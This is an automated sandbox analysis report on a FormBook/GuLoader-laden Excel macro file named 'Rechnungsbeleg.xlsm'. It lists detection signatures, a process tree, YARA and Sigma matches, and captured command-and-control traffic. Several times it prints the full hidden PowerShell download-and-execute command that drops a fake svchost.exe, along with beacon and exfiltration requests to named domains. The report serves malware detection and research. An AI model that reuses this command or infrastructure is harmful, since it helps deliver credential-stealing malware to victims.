Loading ...

Play interactive tourEdit tour

Analysis Report Rechnungsbeleg.xlsm

Overview

General Information

Sample Name:Rechnungsbeleg.xlsm
Analysis ID:278329
MD5:13d68c90dfd6581f051e7cd69170d6b9
SHA1:5637ff31e6eecaf0d6bfc20caa8ae4adde8dd69c
SHA256:e02e2804d98658cc76ef89c09f52f66843e68cb94f7578f1ff856aa4999a3c19

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download file and shellexecute
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Bypasses PowerShell execution policy
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1200 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • powershell.exe (PID: 6016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchost.exe (PID: 6220 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: BFC7596ECD06A9D619DBD482631B0D84)
        • svchost.exe (PID: 6408 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: BFC7596ECD06A9D619DBD482631B0D84)
          • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • svchost.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
              • cmd.exe (PID: 6000 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Powershell download file and shellexecuteShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6016, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6220
      Sigma detected: System File Execution Location AnomalyShow sources
      Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6016, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6220
      Sigma detected: PowerShell Download from URLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6220, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6408

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: TR/Injector.wuyab
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeVirustotal: Detection: 44%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 18%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Rechnungsbeleg.xlsmVirustotal: Detection: 21%Perma Link
      Source: Rechnungsbeleg.xlsmReversingLabs: Detection: 20%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: Rechnungsbeleg.xlsmJoe Sandbox ML: detected
      Source: 4.0.svchost.exe.400000.0.unpackAvira: Label: TR/Injector.wuyab
      Source: 6.0.svchost.exe.400000.0.unpackAvira: Label: TR/Injector.wuyab
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi16_2_02D5E572
      Source: global trafficDNS query: name: onedrive.live.com
      Source: global trafficTCP traffic: 192.168.2.5:49731 -> 192.64.119.224:80
      Source: global trafficTCP traffic: 192.168.2.5:49731 -> 192.64.119.224:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 64.32.22.102:80 -> 192.168.2.5:49733
      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 64.32.22.102:80 -> 192.168.2.5:49734
      Source: global trafficHTTP traffic detected: GET /d2w/?pvj01lRX=/65nfF/Nxm10NrnhIxqp1OrccA5CCv2C4tVcC1Dq4jiYYSyOmWBHNW0BaFzMFPrna1Df&FD=9rX8FzT0 HTTP/1.1Host: www.equifaxsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /d2w/?pvj01lRX=v+VcEx2Oat8H1YXXcMhJ7KJgBNn6b4Axe2Hid9VQh65hvLdlnlM3p4DL0Zb2+MwuG01o&FD=9rX8FzT0 HTTP/1.1Host: www.getscholardollars.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: global trafficHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 52 36 47 53 73 51 58 72 4b 71 67 4a 49 78 58 68 61 31 38 4a 63 4c 51 5a 6f 41 4f 61 44 57 6c 5a 4d 52 63 6c 59 5a 53 68 6f 39 50 6f 6e 42 55 35 75 44 53 73 75 4c 4e 38 39 55 6b 55 7a 52 6c 69 64 6a 78 77 4a 37 44 6a 33 6c 52 48 51 33 2d 31 5a 46 32 4f 46 6c 67 44 46 45 77 41 41 34 4c 68 2d 69 2d 58 6f 61 78 50 39 7a 68 36 62 4a 55 46 53 51 42 68 50 76 43 32 2d 69 6b 49 56 57 5f 4c 77 78 69 47 72 28 43 33 68 54 69 61 63 65 5f 72 4f 65 66 6e 4d 6b 69 35 71 71 56 64 52 54 34 72 31 6e 64 56 54 36 34 65 43 6f 71 51 75 70 4e 38 55 54 74 72 54 6f 79 66 62 70 4b 41 53 64 45 32 41 69 33 6a 4a 43 52 70 42 58 58 67 74 79 30 78 48 65 63 7e 5a 41 31 43 31 70 72 5a 34 4f 56 75 4d 74 64 79 35 6c 64 52 38 61 56 41 57 42 79 53 6d 63 4f 57 44 66 51 39 78 30 38 37 37 45 6c 6d 48 44 78 6c 43 32 6a 28 50 79 61 59 58 79 63 43 62 28 5f 4c 43 52 68 66 55 58 61 48 79 7a 34 67 7a 28 45 69 52 6b 50 49 74 6f 32 45 55 79 71 43 4c 47 57 6e 2d 36 70 6f 75 52 58 45 74 79 4c 54 48 52 64 6c 6f 37 7a 52 66 31 31 4d 39 59 49 44 51 6d 35 61 69 41 72 50 48 38 44 6f 34 44 79 70 59 71 4f 7e 74 35 74 61 2d 28 35 4e 6f 45 54 65 54 36 79 6f 43 79 2d 58 79 36 76 78 6d 45 66 64 4e 41 77 4d 78 34 39 78 5f 31 35 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: pvj01lRX=ncZmaR6GSsQXrKqgJIxXha18JcLQZoAOaDWlZMRclYZSho9PonBU5uDSsuLN89UkUzRlidjxwJ7Dj3lRHQ3-1ZF2OFlgDFEwAA4Lh-i-XoaxP9zh6bJUFSQBhPvC2-ikIVW_LwxiGr(C3hTiace_rOefnMki5qqVdRT4r1ndVT64eCoqQupN8UTtrToyfbpKASdE2Ai3jJCRpBXXgty0xHec~ZA1C1prZ4OVuMtdy5ldR8aVAWBySmcOWDfQ9x0877ElmHDxlC2j(PyaYXycCb(_LCRhfUXaHyz4gz(EiRkPIto2EUyqCLGWn-6pouRXEtyLTHRdlo7zRf11M9YIDQm5aiArPH8Do4DypYqO~t5ta-(5NoETeT6yoCy-Xy6vxmEfdNAwMx49x_154Q).
      Source: global trafficHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 252650Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 56 48 67 66 5f 38 47 73 34 4f 68 49 59 68 66 6c 61 6c 75 4e 65 28 39 51 62 67 64 45 6a 36 31 5a 50 5a 59 77 4a 4a 41 72 6f 4e 50 75 6c 70 66 69 2d 43 67 71 75 4c 4b 75 4e 49 59 5a 41 41 6d 69 5a 37 66 77 4a 7a 43 32 6b 73 36 48 67 32 6e 30 35 34 4e 49 46 68 37 44 48 78 69 41 6a 55 70 33 75 7e 2d 54 59 69 33 44 38 6a 32 39 65 78 52 4a 44 38 5a 6e 4b 54 62 32 4e 57 32 4b 33 72 53 44 52 39 67 43 59 6a 64 79 67 44 61 66 4c 36 37 68 39 69 45 37 65 5a 34 39 39 79 52 52 30 6d 46 33 67 62 63 59 44 53 69 55 69 5a 66 56 66 74 6a 36 48 4c 66 72 51 49 59 54 4f 67 55 52 68 5a 4d 35 53 57 52 74 62 75 54 69 57 37 66 32 65 4b 4a 7a 47 75 6a 6d 72 59 75 55 30 46 69 65 2d 4b 37 6a 4e 46 6d 30 49 70 52 5a 74 71 39 44 48 46 36 5a 48 73 68 52 41 4f 51 33 42 55 4f 7e 35 49 58 6f 48 44 61 6e 43 32 33 30 75 53 79 63 68 53 68 46 62 76 57 43 6c 30 39 66 6b 71 64 43 77 48 38 75 79 37 76 67 68 6f 44 44 39 34 4f 50 52 71 74 53 4d 76 33 70 65 36 71 6f 73 4a 71 45 74 79 68 54 47 52 37 6b 64 72 7a 54 4b 42 6d 50 61 4d 50 53 41 6e 37 59 79 51 31 59 41 31 59 6f 34 62 79 37 38 75 6b 28 61 74 74 4c 64 33 2d 4e 4a 45 54 64 6a 36 79 69 53 7a 2d 47 44 66 64 7a 46 45 77 4b 64 52 56 4e 42 49 70 38 2d 49 31 6f 6d 51 45 4d 42 4e 47 43 41 41 43 7e 33 46 7a 61 4f 55 51 32 47 39 72 68 46 68 57 41 7a 46 5a 32 4b 77 7a 37 2d 28 6a 35 52 53 62 46 30 79 4a 70 36 55 42 54 4b 57 30 71 59 32 78 63 48 69 47 66 37 59 4c 7a 69 52 6d 4a 76 65 5a 42 50 36 64 35 42 33 44 44 55 72 39 36 46 59 6e 32 72 49 68 76 4e 70 55 49 54 41 63 78 54 48 4d 67 30 41 6b 64 41 70 7a 6e 65 4f 35 66 46 69 42 6a 52 39 51 28 6f 65 49 78 37 77 52 31 31 72 51 44 6a 34 6b 4c 72 38 4b 48 74 4f 6d 73 78 64 6b 54 31 64 7a 4f 55 35 6f 62 53 71 6a 75 6e 59 63 35 64 64 44 73 72 56 4e 77 6c 38 51 31 76 6e 4c 52 4c 36 79 44 39 56 7a 28 57 46 58 4f 35 58 2d 62 76 4a 6d 7a 62 78 50 5a 6c 35 39 39 58 68 38 74 48 54 36 74 5a 50 66 42 41 6f 78 69 6e 76 6f 4d 39 66 65 75 6a 5a 6a 59 6f 59 44 76 4f 6b 57 63 36 4e 36 28 68 6c 53 55 52 4f 4c 54 78 6f 41 4b 6a 6d 38 58 4c 7a 5a 77 46 6e 4f 53 58 42 46 4d 4c 47 5f 79 63 6f 68 7a 45 67 34 77 6a 68 75 32 57 74 53 34 49 43 64 54 43 49 38 43 59 47 4c 33 74 6c 31 35 33 31 65 46 77 4a 38 58 76 6d 4a 79 42 69 73 58 74 49 64 75 37 79 74 64 4b 4c 51 4f 59 42 33 7a 30 66 67 31 69 38 6a 50 63 6b 7a 63 52 58 5a 4e 6e 57 37 78 78 75 77 47 32 38 56 79 45 38 74 62 69 50 74 46 66 47 32 66 5f 64 38 5a 4f 30 51 53 4d 69 66 78 34 6f 48 63 6d 38 4e 38 7a 64 61 4a 46 30 37 62 72 49 73 76 5a 6d 65 34 48 61 79 30 46 68 32 63 30 4e 6d 78 4f 71 34 4f 51 63 69 5
      Source: C:\Windows\explorer.exeCode function: 11_2_0588A5A2 getaddrinfo,setsockopt,recv,11_2_0588A5A2
      Source: global trafficHTTP traffic detected: GET /d2w/?pvj01lRX=/65nfF/Nxm10NrnhIxqp1OrccA5CCv2C4tVcC1Dq4jiYYSyOmWBHNW0BaFzMFPrna1Df&FD=9rX8FzT0 HTTP/1.1Host: www.equifaxsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /d2w/?pvj01lRX=v+VcEx2Oat8H1YXXcMhJ7KJgBNn6b4Axe2Hid9VQh65hvLdlnlM3p4DL0Zb2+MwuG01o&FD=9rX8FzT0 HTTP/1.1Host: www.getscholardollars.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: svchost.exe, 00000010.00000002.483024815.0000000003E9F000.00000004.00000001.sdmpString found in binary or memory: Location: http://www.facebook.com/groups/collegemodeparentretreat equals www.facebook.com (Facebook)
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 52 36 47 53 73 51 58 72 4b 71 67 4a 49 78 58 68 61 31 38 4a 63 4c 51 5a 6f 41 4f 61 44 57 6c 5a 4d 52 63 6c 59 5a 53 68 6f 39 50 6f 6e 42 55 35 75 44 53 73 75 4c 4e 38 39 55 6b 55 7a 52 6c 69 64 6a 78 77 4a 37 44 6a 33 6c 52 48 51 33 2d 31 5a 46 32 4f 46 6c 67 44 46 45 77 41 41 34 4c 68 2d 69 2d 58 6f 61 78 50 39 7a 68 36 62 4a 55 46 53 51 42 68 50 76 43 32 2d 69 6b 49 56 57 5f 4c 77 78 69 47 72 28 43 33 68 54 69 61 63 65 5f 72 4f 65 66 6e 4d 6b 69 35 71 71 56 64 52 54 34 72 31 6e 64 56 54 36 34 65 43 6f 71 51 75 70 4e 38 55 54 74 72 54 6f 79 66 62 70 4b 41 53 64 45 32 41 69 33 6a 4a 43 52 70 42 58 58 67 74 79 30 78 48 65 63 7e 5a 41 31 43 31 70 72 5a 34 4f 56 75 4d 74 64 79 35 6c 64 52 38 61 56 41 57 42 79 53 6d 63 4f 57 44 66 51 39 78 30 38 37 37 45 6c 6d 48 44 78 6c 43 32 6a 28 50 79 61 59 58 79 63 43 62 28 5f 4c 43 52 68 66 55 58 61 48 79 7a 34 67 7a 28 45 69 52 6b 50 49 74 6f 32 45 55 